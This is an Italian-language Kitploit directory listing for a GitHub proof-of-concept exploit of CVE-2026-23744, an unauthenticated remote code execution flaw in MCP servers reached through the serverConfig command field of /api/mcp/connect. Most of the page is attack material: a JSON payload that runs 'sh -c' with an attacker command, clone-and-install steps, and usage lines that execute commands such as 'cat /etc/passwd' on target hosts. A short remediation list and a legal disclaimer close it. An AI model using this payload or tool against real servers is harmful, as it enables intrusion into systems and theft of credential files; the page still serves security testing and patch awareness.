Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/d3vn0mi/cve-2026-23744-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubd3vn0mi/cve-2026-23744-poc

CVE-2026-23744-POC

Python PoC per CVE-2026-23744, RCE non autenticato nei server MCP tramite il campo comando serverConfig di /api/mcp/connect (porta predefinita 6274)

Vedi Repository
25 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-23744 — RCE non autenticato su server MCP

Proof-of-Concept exploit di d3vn0mi

Panoramica

CVE-2026-23744 è una vulnerabilità di Remote Code Execution (RCE) non autenticata nei server compatibili con MCP esposti sulla porta 6274. L'endpoint /api/mcp/connect accetta un oggetto serverConfig che consente ai chiamanti di specificare un comando OS arbitrario e relativi argomenti — senza alcun controllo di autenticazione o autorizzazione.

Un attaccante con accesso di rete al servizio può eseguire comandi arbitrari come utente che esegue il server MCP.

DettaglioValore
ID CVECVE-2026-23744
TipoRemote Code Execution non autenticato
EndpointPOST /api/mcp/connect
Porta6274 (predefinita)
GravitàCritica

Payload vulnerabile

root@kitploit:~
{
  "serverConfig": {
    "command": "sh",
    "args": ["-c", "<ATTACKER_COMMAND>"],
    "env": {}
  },
  "serverId": "anything"
}

Il server avvia il command fornito con gli args specificati senza sanitizzazione o controllo degli accessi.

Installazione

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2026-23744-POC.git
cd CVE-2026-23744-POC
pip install -r requirements.txt

Utilizzo

root@kitploit:~
# Utilizzo base
python3 exploit.py -t <TARGET_IP> -c '<COMMAND>'

# Porta personalizzata
python3 exploit.py -t 192.168.1.10 -p 6274 -c 'id > /tmp/pwned.txt'

# Salta il controllo di raggiungibilità
python3 exploit.py -t 10.0.0.5 -c 'whoami' --no-check

# ID server personalizzato
python3 exploit.py -t 127.0.0.1 -c 'cat /etc/passwd' -s my_server

Opzioni

FlagDescrizione
-t, --targetIP o hostname del target (obbligatorio)
-c, --commandComando OS da eseguire (obbligatorio)
-p, --portPorta del target (predefinita: 6274)
-s, --server-idValore serverId nel payload
--timeoutTimeout del probe in secondi (predefinito: 30)
--no-checkSalta il controllo iniziale di raggiungibilità

Rimedio

  • Non esporre il server MCP a reti non fidate.
  • Applicare le patch del fornitore appena disponibili.
  • Limitare l'accesso all'endpoint /api/mcp/connect tramite autenticazione e controlli a livello di rete.
  • Monitorare l'avvio di processi inattesi dal processo del server MCP.

Disclaimer

Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi. L'accesso non autorizzato a sistemi informatici è illegale. L'autore non si assume alcuna responsabilità per un uso improprio. Ottenere sempre la dovuta autorizzazione prima di effettuare test.

Licenza

Questo progetto è concesso in licenza sotto la MIT License.

Autore

d3vn0mi — github.com/d3vn0mi

Scarica lo strumento